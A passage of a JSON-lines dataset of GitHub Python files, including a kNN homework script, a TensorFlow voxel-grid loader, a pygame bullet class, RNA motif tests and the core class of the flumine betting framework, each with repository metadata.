super(LoadGroupContainer,self).__init__(idLoadGroupContainer,tLoadGroupContainer)\n loadGroups= list()\n for key in sorted(loadGroupsDict):\n ns= loadGroupsDict[key]\n loadGroups.append(getLoadGroupObject(ns))\n self.appendTable(tb.SCXMLTableXMLNodes(idLoadGroupContainerTb,tLoadGroupContainerTb, 'Load groups', None,loadGroups))\n \n","repo_name":"xcfem/xc","sub_path":"python_modules/import_export/sciaXML/scia_loads/load_group_container.py","file_name":"load_group_container.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"4415216123","text":"import numpy as np, matplotlib.pyplot as plt, pandas as pd, seaborn as sns\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom scipy.io.arff import loadarff\n\n# Read the ARFF file and prepare data\ndata = loadarff(\"./data/column_diagnosis.arff\")\ndf = pd.DataFrame(data[0])\ndf[\"class\"] = df[\"class\"].str.decode(\"utf-8\")\nX, y = df.drop(\"class\", axis=1), df[\"class\"]\n\n# Initialize StratifiedKFold with 10 folds and shuffling\nfolds = StratifiedKFold(n_splits=10, shuffle=True, random_state=0)\n\n# Create kNN classifiers with k=1 and k=5\nknn_1 = KNeighborsClassifier(n_neighbors=1)\nknn_5 = KNeighborsClassifier(n_neighbors=5)\n\nlabels = [\"Hernia\", 
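# A hedged aside on the index() view a couple of records above: the Python
# loop that totals timeLength can be pushed into the database with Django's
# aggregate API (assuming the same Timestamp model).
from django.db.models import Sum

total_hours = Timestamp.objects.aggregate(total=Sum('timeLength'))['total'] or 0
total_money = total_hours * 880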
\"Normal\", \"Spondylolisthesis\"]\ncm_1, cm_5 = np.zeros((3, 3)), np.zeros((3, 3))\nfor train_k, test_k in folds.split(X, y):\n X_train, X_test = X.iloc[train_k], X.iloc[test_k]\n y_train, y_test = y.iloc[train_k], y.iloc[test_k]\n\n # Fit kNN classifiers and assess\n knn_1.fit(X_train, y_train)\n knn_5.fit(X_train, y_train)\n knn_1_pred, knn_5_pred = knn_1.predict(X_test), knn_5.predict(X_test)\n cm_1 += np.array(confusion_matrix(y_test, knn_1_pred, labels=labels))\n cm_5 += np.array(confusion_matrix(y_test, knn_5_pred, labels=labels))\n\n# Calculate cumulative confusion matrices\ncm_diff = cm_1 - cm_5\ncm_diff_df = pd.DataFrame(cm_diff, index=labels, columns=labels)\n\n# Plot the differences\nplt.figure(figsize=(9, 7))\nsns.heatmap(\n cm_diff_df, cmap=\"Purples\", annot=True, annot_kws={\"fontsize\": 14}, fmt=\"g\"\n)\nplt.xlabel(\"Predicted\")\nplt.ylabel(\"Real\")\nplt.show()\n","repo_name":"goncalobarias/Homeworks-ML","sub_path":"hw2/report/assets/code_2.py","file_name":"code_2.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73893281049","text":"import os\n\nimport pytest\n\nfrom test import StageTest\n\nfrom pymotifs.motifs.release import Loader\n\n\nclass IfeTest(StageTest):\n loader_class = Loader\n\n def test_it_loads_representative_ifes(self):\n assert self.loader.ifes('1.0') == [\n '157D|1|A+157D|1|B', '1DUH|1|A', '1EIY|1|C', '1ET4|1|E',\n '1G59|1|D', '1GID|1|B', '1IBK|1|X', '1J5E|1|A', '1KOG|1|P',\n '1MDG|1|A', '1UTD|1|0', '1VY4|1|AY', '1VY4|1|BA', '1VY4|1|BB',\n '1WMQ|1|D', '1X8W|1|B', '1X8W|1|C', '2HOJ|1|A', '2IL9|1|A',\n '3CW5|1|A', '4A3G|1|P', '4CS1|1|A', '4FTE|1|R', '4PMI|1|A',\n '4Q0B|1|T', '4Q0B|1|t', '4V88|1|A5+4V88|1|A8', '4V88|1|A6',\n '4V88|1|A7', '4V9K|1|CW'\n ]\n\n @pytest.mark.skip(\"Not sure what data to use for this\")\n def test_it_only_uses_structured_ifes(self):\n pass\n\n\nclass LoopsTest(StageTest):\n loader_class = Loader\n\n def loops(self, loop_type, *ifes, **kwargs):\n loop = kwargs.get('loop', '0.4')\n return self.loader.loops(loop, loop_type, ifes)\n\n def test_uses_all_valid_loops(self):\n assert len(self.loops('IL', '1FJG|1|A')) == 62\n assert len(self.loops('HL', '1FJG|1|A')) == 32\n\n def test_it_uses_loops_that_passed_loop_qa(self):\n loops = self.loops('HL', '1S72|1|0', '1S72|1|9')\n assert 'HL_1S72_004' not in loops\n assert 'HL_1S72_018' not in loops\n assert 'HL_1S72_021' not in loops\n assert len(loops) == 63\n\n def test_it_uses_loops_from_ife_chains(self):\n loops = self.loops('HL', '1FJG|1|A', '4V4Q|1|CA')\n assert 'HL_2IL9_001' not in loops\n assert len(loops) == 64\n\n def test_respects_the_blacklisted_loops(self):\n loops = self.loops('HL', '2IL9|1|A', '2IL9|1|M')\n assert 'HL_2IL9_002' not in loops\n assert 'HL_2IL9_005' not in loops\n assert len(loops) == 2\n\n\nclass DataTests(StageTest):\n loader_class = Loader\n\n @pytest.mark.skip(\"Do not want to run full clustering yet\")\n def test_it_creates_entries_for_hl_and_il(self):\n data = self.loader.data(['1GID', '4V4Q', '1S72'], dry_run=True)\n assert len(data) == 2\n\n @pytest.mark.skip(\"Do not want to run full clustering yet\")\n def test_it_can_cluster_motifs(self):\n data = self.loader.data(['1GID', '4V4Q', '1S72'])\n assert len(data) == 2\n assert os.path.exists(data[0]['description'])\n assert 
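# A hedged continuation of the kNN snippet above: once the 3x3 confusion
# matrices are accumulated over the folds, per-class recall is the diagonal
# divided by the row sums. The counts below are made up.
import numpy as np

cm = np.array([[50, 7, 3], [9, 85, 6], [1, 4, 145]])
recall = np.diag(cm) / cm.sum(axis=1)
for label, r in zip(["Hernia", "Normal", "Spondylolisthesis"], recall):
    print(f"{label}: recall {r:.2f}")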
os.path.exists(data[1]['description'])\n","repo_name":"BGSU-RNA/RNA-3D-Hub-core","sub_path":"test/motifs/release_test.py","file_name":"release_test.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"15698663050","text":"lst=list()\r\nfname = input(\"Enter file name: \")\r\nfh = open(fname)\r\n\r\n#form list of words in the line\r\nfor line in fh:\r\n\twords=line.split()\r\n\r\n\t#take each word from line and put to the list\r\n\tfor word in words:\r\n\t\tif word in lst: continue\r\n\t\tlst.append(word)\r\nlst.sort()\r\nprint(lst)\r\n","repo_name":"amrutha-somayaji/Python-for-Everybody","sub_path":"Python Data Structures/Week 4/ex_04_01.py","file_name":"ex_04_01.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72419270808","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nfrom dialogs.dialog import Dialog\n\nimport os.path\n\n\nclass KeyboardShortcutsDialog(Dialog):\n\n def __init__(self, main_window):\n self.main_window = main_window\n\n def run(self):\n self.setup()\n self.view.show_all()\n del(self.view)\n\n def setup(self):\n builder = Gtk.Builder()\n builder.add_from_file(os.path.dirname(os.path.realpath(__file__)) + '/shortcuts_window.ui')\n self.view = builder.get_object('shortcuts-window')\n self.view.set_transient_for(self.main_window)\n \n\n","repo_name":"cvfosammmm/Porto","sub_path":"dialogs/keyboard_shortcuts/keyboard_shortcuts.py","file_name":"keyboard_shortcuts.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"31"} +{"seq_id":"26316332460","text":"# -*- coding: utf-8 -*-\n#\n# on_rtd is whether we are on readthedocs.org\nimport os\non_rtd = os.environ.get('READTHEDOCS', None) == 'True'\n\nif not on_rtd: # only import and set the theme if we're building docs locally\n import sphinx_rtd_theme\n html_theme = 'sphinx_rtd_theme'\n html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\n# otherwise, readthedocs.org uses their theme by default, so no need to specify it\n\nproject = 'FIWARE-Stream-Oriented-GE'\n","repo_name":"kat09kat09/doc-kurento-readthedocs","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"12079779236","text":"#!/usr/bin/python2\n\nimport tensorflow as tf\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport re\nimport math\n\nimport os\n\nimport rospy\n\nfrom pyquaternion import Quaternion\n\ndef load_voxelgrid(infilename):\n ifile = open(infilename + \".binvoxelgrid\", \"r\")\n metadata = np.fromfile(ifile, dtype=np.uint32, count=5)\n\n width = metadata[2]\n height = metadata[3]\n depth = metadata[4]\n\n voxelgrid = np.fromfile(ifile, dtype=np.float32, count=width*height*depth)\n voxelgrid = np.reshape(voxelgrid, [depth, height, width])\n\n ifile.close()\n\n return voxelgrid\n\ndef save_voxelgrid(outfilename, npmatrix):\n ofile = open(outfilename + \".binvoxelgrid\", \"w\")\n ofile.write(\"VXGR\")\n\n version = 1\n width = npmatrix.shape[2]\n height = npmatrix.shape[1]\n depth = npmatrix.shape[0]\n metadata = np.asarray([version, width, height, depth], dtype=np.uint32)\n ofile.write(metadata.tobytes())\n\n npmatrix = npmatrix.astype('float32')\n ofile.write(npmatrix.tobytes())\n\n 
ofile.close()\n pass\n\ndef save_voxelgrid_nchannels(outfilename, npmatrix):\n trmatrix = np.transpose(npmatrix, [3, 0, 1, 2])\n for i in range(0, len(trmatrix)):\n save_voxelgrid(outfilename + str(i), trmatrix[i])\n pass\n\ndef load_voxelgrid4(infilename):\n result = []\n for i in range(0, 4):\n result.append(load_voxelgrid(infilename + str(i)))\n result = np.transpose(result, [1, 2, 3, 0])\n return result\n\ndef get_scene_3d_dataset_next_kernel(source_file_name_prefix, x_empty_prefix,\n x_frontier_prefix, y_prefix, y_channels, enable_augmentation,\n start, end):\n image_load_ok = True\n counter = start\n augmentation_counter = 0\n\n rotations = [[0, 0, 0], ]\n if ('rotation' in enable_augmentation):\n rotations = []\n #for a in range(0, 4):\n for b in range(0, 2):\n for c in range(0, 4):\n rotations.append([0, b, c])\n if ('rotation4' in enable_augmentation):\n rotations = []\n for c in range(0, 4):\n rotations.append([c, 0, 0])\n\n sub_files = 0\n sub_files_counter = 0\n if ('files8' in enable_augmentation):\n sub_files = 8\n if ('files4' in enable_augmentation):\n sub_files = 4\n\n while (image_load_ok):\n sub_file_suffix = \"\"\n if (sub_files != 0):\n sub_file_suffix = \"_gte_\" + str(sub_files_counter)\n sub_file_gt_suffix = \"\"\n if (y_channels == 4):\n sub_file_gt_suffix = \"_\"\n\n empty_filename = source_file_name_prefix + str(counter) + x_empty_prefix + sub_file_suffix\n frontier_filename = source_file_name_prefix + str(counter) + x_frontier_prefix + sub_file_suffix\n gt_filename = source_file_name_prefix + str(counter) + y_prefix + sub_file_suffix + sub_file_gt_suffix\n\n try:\n for rotation in rotations:\n #rospy.loginfo(\"nbv_3d_cnn: loading empty '%s'\" % frontier_filename)\n empty = load_voxelgrid(empty_filename)\n #rospy.loginfo(\"nbv_3d_cnn: loading frontier '%s'\" % frontier_filename)\n frontier = load_voxelgrid(frontier_filename)\n #rospy.loginfo(\"nbv_3d_cnn: loading gt '%s'\" % gt_filename)\n if (y_channels == 1 or y_channels == 52):\n gt = load_voxelgrid(gt_filename)\n elif (y_channels == 4):\n gt = load_voxelgrid4(gt_filename)\n\n empty = np.rot90(np.array(empty), k=rotation[2], axes=(0, 1))\n frontier = np.rot90(np.array(frontier), k=rotation[2], axes=(0, 1))\n gt = np.rot90(np.array(gt), k=rotation[2], axes=(0, 1))\n\n empty = np.rot90(np.array(empty), k=rotation[1], axes=(0, 2))\n frontier = np.rot90(np.array(frontier), k=rotation[1], axes=(0, 2))\n gt = np.rot90(np.array(gt), k=rotation[1], axes=(0, 2))\n\n empty = np.rot90(np.array(empty), k=rotation[0], axes=(1, 2))\n frontier = np.rot90(np.array(frontier), k=rotation[0], axes=(1, 2))\n gt = np.rot90(np.array(gt), k=rotation[0], axes=(1, 2))\n\n x = [empty, frontier]\n x = np.transpose(x, [1, 2, 3, 0])\n x = np.array(x)\n\n if (y_channels == 1 or y_channels == 52):\n gt = np.reshape(gt, [len(gt), len(gt[0]), len(gt[0][0]) / y_channels, y_channels])\n y = np.array(gt)\n\n x = x.astype('float32')\n y = y.astype('float32')\n\n batch = ((x, ), (y, ))\n\n yield batch\n pass\n\n except IOError as e:\n rospy.logerr('nbv_3d_cnn: could not load image, error is ' + str(e))\n image_load_ok = False\n pass\n\n if sub_files != 0:\n sub_files_counter += 1\n if (sub_files_counter >= sub_files):\n sub_files_counter = 0\n counter += 1\n else:\n counter += 1\n\n if (counter >= end):\n return\n\n if (rospy.is_shutdown()):\n exit()\n pass\n pass\n\n# returns: dataset, x_image_width, x_image_height, x_image_depth, y_image_width, y_image_height, y_image_depth,\ndef get_scene_3d_dataset(source_file_name_prefix, start, end, mode, 
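# A quick round-trip check using the helpers defined above (the output path is
# hypothetical): save_voxelgrid() writes "VXGR" plus four uint32 header fields,
# which load_voxelgrid() reads back as five uint32 values, so a float32 grid
# should survive unchanged.
import numpy as np

grid = np.random.rand(4, 8, 16).astype(np.float32)   # depth, height, width
save_voxelgrid("/tmp/demo_grid", grid)
assert np.allclose(load_voxelgrid("/tmp/demo_grid"), grid)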
enable_augmentation):\n empty_prefix = '_empty';\n frontier_prefix = '_frontier'\n\n if (mode == 'smooth_directional'):\n output_prefix = '_smooth_directional'\n y_channels = 52\n elif (mode == 'directional'):\n output_prefix = '_directional_gt'\n y_channels = 1\n elif (mode == 'quat'):\n output_prefix = '_scoreangle'\n y_channels = 4\n elif (mode == 'autocomplete'):\n output_prefix = '_environment'\n frontier_prefix = '_occupied'\n y_channels = 1\n else:\n rospy.logfatal('Invalid mode: ' + mode)\n exit(1)\n\n generator = get_scene_3d_dataset_next_kernel(source_file_name_prefix,\n empty_prefix,\n frontier_prefix,\n output_prefix,\n y_channels,\n enable_augmentation,\n start, end)\n\n for ((x, ), (y, )) in generator:\n x_image_width = len(x[0][0])\n x_image_height = len(x[0])\n x_image_depth = len(x)\n y_image_width = len(y[0][0])\n y_image_height = len(y[0])\n y_image_depth = len(y)\n break\n\n dataset = tf.data.Dataset.from_generator(lambda: get_scene_3d_dataset_next_kernel(source_file_name_prefix,\n empty_prefix,\n frontier_prefix,\n output_prefix,\n y_channels,\n enable_augmentation,\n start, end),\n output_types=(tf.float32, tf.float32),\n output_shapes=(tf.TensorShape([1, x_image_depth, x_image_height, x_image_width, 2]),\n tf.TensorShape([1, y_image_depth, y_image_height,\n y_image_width, y_channels])))\n return dataset, x_image_width, x_image_height, x_image_depth, y_image_width, y_image_height, y_image_depth\n\n","repo_name":"RMonica/nbv_3d_prob_cnn","sub_path":"nbv_3d_cnn/scripts/scene_3d_dataset.py","file_name":"scene_3d_dataset.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"5170535672","text":"import pygame\r\nimport math\r\nimport random\r\nfrom bullet import Bullet\r\n\r\n'''\r\nConcept from Bullet.py by Lukas Peraza\r\nhttps://github.com/LBPeraza/Pygame-Asteroids/tree/master/Asteroids\r\n'''\r\n\r\nclass eBullet(Bullet):\r\n\r\n @staticmethod\r\n def init():\r\n i = pygame.image.load('images/enemy-bullet.png').convert_alpha()\r\n eBullet.image = pygame.transform.scale(i, (6, 16))\r\n eBullet.width, eBullet.height = eBullet.image.get_size()\r\n\r\n def __init__(self, x, y, enemy, difficulty):\r\n super(eBullet, self).__init__(enemy.x, enemy.y, eBullet.image, eBullet.height)\r\n self.xDest = x\r\n self.yDest = y\r\n self.enemyX = enemy.x\r\n self.enemyY = enemy.y\r\n o = self.xDest - self.enemyX # opposite\r\n a = self.yDest - self.enemyY # adjacent\r\n self.angle = math.atan(o/a)\r\n\r\n self.speed = random.randint(5, 10)\r\n if difficulty == \"easy\":\r\n self.speed = random.randint(5, 8)\r\n elif difficulty == \"normal\":\r\n self.speed = random.randint(6, 9)\r\n elif difficulty == \"hard\":\r\n self.speed = random.randint(7, 10)\r\n\r\n def update(self):\r\n self.x += self.speed * self.angle\r\n self.y += self.speed\r\n self.updateRect()\r\n super(eBullet, self).update()\r\n","repo_name":"estevaz12/15-112_TP_112-Galaga","sub_path":"TP2/enemyBullet.py","file_name":"enemyBullet.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74836235928","text":"class Solution(object):\n def uniquePaths(self, m, n):\n # 2D - DP, T(n): O(n.m), S(n): O(n) - no of columns in a row\n row = [1]*n\n for i in range(m-2,-1,-1): # except the bottom row which is all 1's\n newRow = [1]*n\n for j in range(n-2,-1,-1): #except the last Col which is all 1's\n newRow[j] = newRow[j+1]+row[j] # 
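# A hedged aside on the eBullet snippet above: math.atan(o/a) raises
# ZeroDivisionError when the target shares the enemy's y-coordinate, and the
# result is then used as a slope rather than a heading. atan2 with explicit
# velocity components is the usual alternative; the coordinates are made up.
import math

def aim(src_x, src_y, dst_x, dst_y, speed):
    angle = math.atan2(dst_y - src_y, dst_x - src_x)   # safe in every quadrant
    return speed * math.cos(angle), speed * math.sin(angle)

vx, vy = aim(100, 50, 160, 130, 8)
print(round(vx, 2), round(vy, 2))   # -> 4.8 6.4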
right value + down value of previous row \n row = newRow\n return row[0]\n\n","repo_name":"KunalAnand2907/Competitive--Coding","sub_path":"62-unique-paths/unique-paths.py","file_name":"unique-paths.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13287747946","text":"import time\nimport queue\nimport logging\nimport threading\nfrom typing import Type\nfrom betfairlightweight import resources\n\nfrom .strategy.strategy import Strategies, BaseStrategy\nfrom .streams.streams import Streams\nfrom .events import events\nfrom .worker import BackgroundWorker\nfrom .clients import Clients, BaseClient\nfrom .markets.markets import Markets\nfrom .markets.market import Market\nfrom .markets.middleware import Middleware, SimulatedMiddleware\nfrom .execution.betfairexecution import BetfairExecution\nfrom .execution.simulatedexecution import SimulatedExecution\nfrom .order.process import process_current_orders\nfrom .controls.clientcontrols import BaseControl, MaxTransactionCount\nfrom .controls.tradingcontrols import (\n OrderValidation,\n StrategyExposure,\n MarketValidation,\n)\nfrom .controls.loggingcontrols import LoggingControl\nfrom .exceptions import FlumineException, ClientError\nfrom . import config, utils\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseFlumine:\n SIMULATED = False\n\n def __init__(self, client: BaseClient = None):\n \"\"\"\n Base framework class\n\n :param client: flumine client instance\n \"\"\"\n self._running = False\n # streams (market/order)\n self.streams = Streams(self)\n\n self.clients = Clients()\n\n # FIFO queue\n self.handler_queue = queue.Queue()\n\n # markets\n self.markets = Markets()\n\n # middleware\n self._market_middleware = []\n\n # strategies\n self.strategies = Strategies()\n\n # order execution class\n self.simulated_execution = SimulatedExecution(self)\n self.betfair_execution = BetfairExecution(self)\n\n # add client\n if client:\n self.add_client(client)\n\n # logging controls (e.g. 
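# A hedged cross-check for the uniquePaths DP above: the answer counts lattice
# paths, i.e. the binomial coefficient C(m + n - 2, m - 1), which is handy for
# sanity-checking the table-based version.
import math

def unique_paths_closed_form(m, n):
    return math.comb(m + n - 2, m - 1)

assert unique_paths_closed_form(3, 7) == 28   # matches the DP for a 3x7 grid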
database logger)\n self._logging_controls = []\n\n # trading controls\n self.trading_controls = []\n # add default controls (processed in order)\n self.add_trading_control(OrderValidation)\n self.add_trading_control(MarketValidation)\n self.add_trading_control(StrategyExposure)\n\n # workers\n self._workers = []\n\n def run(self) -> None:\n raise NotImplementedError\n\n def add_client(self, client: BaseClient) -> None:\n self.clients.add_client(client)\n self.streams.add_client(client)\n # add execution\n client.add_execution(self)\n # add simulation middleware if required\n if self.clients.simulated and not any(\n isinstance(val, SimulatedMiddleware) for val in self._market_middleware\n ):\n self.add_market_middleware(SimulatedMiddleware())\n # register default client controls (processed in order)\n self.add_client_control(client, MaxTransactionCount)\n\n def add_strategy(self, strategy: BaseStrategy) -> None:\n logger.info(\"Adding strategy %s\", strategy)\n self.streams(strategy) # create required streams\n self.strategies(strategy, self.clients, self) # store in strategies\n self.log_control(events.StrategyEvent(strategy))\n\n def add_worker(self, worker: BackgroundWorker) -> None:\n logger.info(\"Adding worker %s\", worker.name)\n self._workers.append(worker)\n\n def add_client_control(\n self, client: BaseClient, client_control: Type[BaseControl], **kwargs\n ) -> None:\n logger.info(\"Adding client control %s\", client_control.NAME)\n client.trading_controls.append(client_control(self, client, **kwargs))\n\n def add_trading_control(self, trading_control: Type[BaseControl], **kwargs) -> None:\n logger.info(\"Adding trading control %s\", trading_control.NAME)\n self.trading_controls.append(trading_control(self, **kwargs))\n\n def add_market_middleware(self, middleware: Middleware) -> None:\n logger.info(\"Adding market middleware %s\", middleware)\n self._market_middleware.append(middleware)\n\n def add_logging_control(self, logging_control: LoggingControl) -> None:\n logger.info(\"Adding logging control %s\", logging_control.NAME)\n self._logging_controls.append(logging_control)\n\n def log_control(self, event: events.BaseEvent) -> None:\n for logging_control in self._logging_controls:\n logging_control.logging_queue.put(event)\n\n def _add_default_workers(self) -> None:\n return\n\n def _process_market_books(self, event: events.MarketBookEvent) -> None:\n for market_book in event.event:\n market_id = market_book.market_id\n\n # check latency (only if marketBook is from a stream update)\n if market_book.streaming_snap is False:\n latency = time.time() - (market_book.publish_time_epoch / 1e3)\n if latency > 2:\n logger.warning(\n \"High latency between current time and MarketBook publish time\",\n extra={\n \"market_id\": market_id,\n \"latency\": latency,\n \"pt\": market_book.publish_time,\n },\n )\n\n market = self.markets.markets.get(market_id)\n market_is_new = market is None\n if market_is_new:\n market = self._add_market(market_id, market_book)\n elif market.closed:\n self.markets.add_market(market_id, market)\n\n if market_book.status == \"CLOSED\":\n self.handler_queue.put(events.CloseMarketEvent(market_book))\n continue\n\n # process market\n market(market_book)\n\n # process middleware\n for middleware in self._market_middleware:\n utils.call_middleware_error_handling(middleware, market)\n\n for strategy in self.strategies:\n if market_book.streaming_unique_id in strategy.stream_ids:\n if market_is_new:\n utils.call_strategy_error_handling(\n strategy.process_new_market, 
market, market_book\n )\n if utils.call_strategy_error_handling(\n strategy.check_market_book, market, market_book\n ):\n utils.call_strategy_error_handling(\n strategy.process_market_book, market, market_book\n )\n\n def _process_sports_data(self, event: events.SportsDataEvent) -> None:\n for sports_data in event.event:\n # get marketId\n market_id = sports_data.market_id\n # get market\n market = self.markets.markets.get(market_id)\n if market is None:\n logger.error(\n \"Market not present for sports data\", extra={\"market_id\": market_id}\n )\n continue\n for strategy in self.strategies:\n if utils.call_strategy_error_handling(\n strategy.check_sports, market, sports_data\n ):\n utils.call_strategy_error_handling(\n strategy.process_sports_data, market, sports_data\n )\n\n def process_order_package(self, order_package) -> None:\n \"\"\"Execute through client.\"\"\"\n order_package.client.execution.handler(order_package)\n\n def _add_market(self, market_id: str, market_book: resources.MarketBook) -> Market:\n logger.info(\"Adding: %s to markets\", market_id)\n market = Market(self, market_id, market_book)\n self.markets.add_market(market_id, market)\n for middleware in self._market_middleware:\n middleware.add_market(market)\n return market\n\n def _remove_market(self, market: Market, clear: bool = True) -> None:\n logger.info(\"Removing market %s\", market.market_id, extra=self.info)\n for middleware in self._market_middleware:\n middleware.remove_market(market)\n for strategy in self.strategies:\n strategy.remove_market(market.market_id)\n if clear:\n self.markets.remove_market(market.market_id)\n\n def _process_raw_data(self, event: events.RawDataEvent) -> None:\n stream_id, clk, publish_time, data = event.event\n for datum in data:\n if \"id\" in datum:\n market_id = datum[\"id\"]\n market = self.markets.markets.get(market_id)\n if market is None:\n market = self._add_market(market_id, None)\n elif market.closed:\n self.markets.add_market(market_id, market)\n\n if \"marketDefinition\" in datum:\n market.update_market_catalogue = True\n if datum[\"marketDefinition\"][\"status\"] == \"CLOSED\":\n datum[\"_stream_id\"] = stream_id\n self.handler_queue.put(events.CloseMarketEvent(datum))\n\n for strategy in self.strategies:\n if stream_id in strategy.stream_ids:\n utils.call_process_raw_data(strategy, clk, publish_time, datum)\n\n def _process_market_catalogues(self, event: events.MarketCatalogueEvent) -> None:\n for market_catalogue in event.event:\n market = self.markets.markets.get(market_catalogue.market_id)\n if market:\n if market.market_catalogue is None:\n market.market_catalogue = market_catalogue\n self.log_control(events.MarketEvent(market))\n logger.info(\n \"Created marketCatalogue for %s\",\n market.market_id,\n extra=market.info,\n )\n else:\n market.market_catalogue = market_catalogue\n logger.info(\n \"Updated marketCatalogue for %s\",\n market.market_id,\n extra=market.info,\n )\n market.update_market_catalogue = False\n\n for strategy in self.strategies:\n if (\n market.market_book\n and market.market_book.streaming_unique_id\n in strategy.stream_ids\n ) or strategy.market_cached(market.market_id):\n utils.call_strategy_error_handling(\n strategy.process_market_catalogue, market, market_catalogue\n )\n\n def _process_current_orders(self, event: events.CurrentOrdersEvent) -> None:\n # update state\n if event.event:\n process_current_orders(\n self.markets, self.strategies, event, self.log_control, self._add_market\n )\n for market in self.markets:\n if market.closed 
is False and market.blotter.active:\n for strategy in self.strategies:\n strategy_orders = market.blotter.strategy_orders(strategy)\n if strategy_orders:\n utils.call_process_orders_error_handling(\n strategy, market, strategy_orders\n )\n\n def _process_custom_event(self, event: events.CustomEvent) -> None:\n try:\n event.callback(self, event)\n except FlumineException as e:\n logger.error(\n \"FlumineException error %s in _process_custom_event %s\",\n e,\n event.callback,\n exc_info=True,\n )\n except Exception as e:\n logger.exception(\n \"Unknown error %s in _process_custom_event %s\",\n e,\n event.callback,\n exc_info=True,\n )\n if config.raise_errors:\n raise\n\n def _process_close_market(self, event: events.CloseMarketEvent) -> None:\n market_book = event.event\n if isinstance(market_book, dict):\n recorder = True\n market_id = market_book[\"id\"]\n stream_id = market_book[\"_stream_id\"]\n else:\n recorder = False\n market_id = market_book.market_id\n stream_id = market_book.streaming_unique_id\n market = self.markets.markets.get(market_id)\n if market is None:\n logger.warning(\n \"Market %s not present when closing\",\n market_id,\n extra={\"market_id\": market_id, **self.info},\n )\n return\n # process market\n if market.closed is False:\n market.close_market()\n if recorder is False:\n market(market_book)\n market.blotter.process_closed_market(event.event)\n\n for strategy in self.strategies:\n if stream_id in strategy.stream_ids:\n strategy.process_closed_market(market, event.event)\n\n if recorder is False and self.clients.simulated:\n # simulate ClearedOrdersEvent\n cleared_orders = resources.ClearedOrders(\n moreAvailable=False, clearedOrders=[]\n )\n cleared_orders.market_id = market_id\n self._process_cleared_orders(events.ClearedOrdersEvent(cleared_orders))\n for client in self.clients:\n # simulate ClearedMarketsEvent\n cleared_markets = resources.ClearedOrders(\n moreAvailable=False,\n clearedOrders=[market.cleared(client)],\n )\n self._process_cleared_markets(\n events.ClearedMarketsEvent(cleared_markets)\n )\n self.log_control(event)\n logger.info(\"Market closed\", extra={\"market_id\": market_id, **self.info})\n\n # check for markets that have been closed for x seconds and remove\n if not self.clients.simulated:\n # due to monkey patching this will clear simulated markets\n closed_markets = [\n m\n for m in self.markets\n if m.closed\n and m.elapsed_seconds_closed\n and m.elapsed_seconds_closed > 3600\n ]\n for market in closed_markets:\n self._remove_market(market)\n else:\n self._remove_market(market, clear=False)\n\n def _process_cleared_orders(self, event):\n market_id = event.event.market_id\n market = self.markets.markets.get(market_id)\n if market is None:\n logger.warning(\n \"Market %s not present when clearing\" % market_id,\n extra={\"market_id\": market_id, **self.info},\n )\n return\n\n meta_orders = market.blotter.process_cleared_orders(event.event)\n self.log_control(events.ClearedOrdersMetaEvent(meta_orders))\n logger.info(\n \"Market cleared\",\n extra={\n \"market_id\": market_id,\n \"order_count\": len(meta_orders),\n **self.info,\n },\n )\n\n def _process_cleared_markets(self, event: events.ClearedMarketsEvent):\n # todo update blotter?\n for cleared_market in event.event.orders:\n logger.info(\n \"Market level cleared\",\n extra={\n \"market_id\": cleared_market.market_id,\n \"profit\": cleared_market.profit,\n \"bet_count\": cleared_market.bet_count,\n },\n )\n self.log_control(event)\n\n def _process_end_flumine(self) -> None:\n 
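# called from __exit__ during shutdown; lets each strategy run its finish logic\n 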
self.strategies.finish(self)\n\n @property\n def info(self) -> dict:\n return {\n \"clients\": self.clients.info,\n \"markets\": {\n \"market_count\": len(self.markets),\n \"open_market_count\": len(self.markets.open_market_ids),\n },\n \"streams\": [s for s in self.streams],\n \"logging_controls\": self._logging_controls,\n \"threads\": threading.enumerate(),\n }\n\n def __enter__(self):\n logger.info(\"Starting flumine\", extra=self.info)\n if len(self.clients) == 0:\n raise ClientError(\"No clients provided\")\n # simulated\n if self.SIMULATED:\n config.simulated = True\n else:\n config.simulated = False\n # login\n self.clients.login()\n self.clients.update_account_details()\n # add default and start all workers\n self._add_default_workers()\n for w in self._workers:\n w.start()\n # start logging controls\n for c in self._logging_controls:\n c.start()\n # process config (logging)\n self.log_control(events.ConfigEvent(config))\n # start strategies\n self.strategies.start(self)\n # start streams\n self.streams.start()\n\n self._running = True\n\n def __exit__(self, *args):\n # shutdown framework\n self._process_end_flumine()\n # shutdown workers\n for w in self._workers:\n w.shutdown()\n # shutdown streams\n self.streams.stop()\n # shutdown thread pools\n self.simulated_execution.shutdown()\n self.betfair_execution.shutdown()\n # shutdown logging controls\n self.log_control(events.TerminationEvent(self))\n for c in self._logging_controls:\n if c.is_alive():\n c.join()\n # logout\n self.clients.logout()\n self._running = False\n logger.info(\"Exiting flumine\", 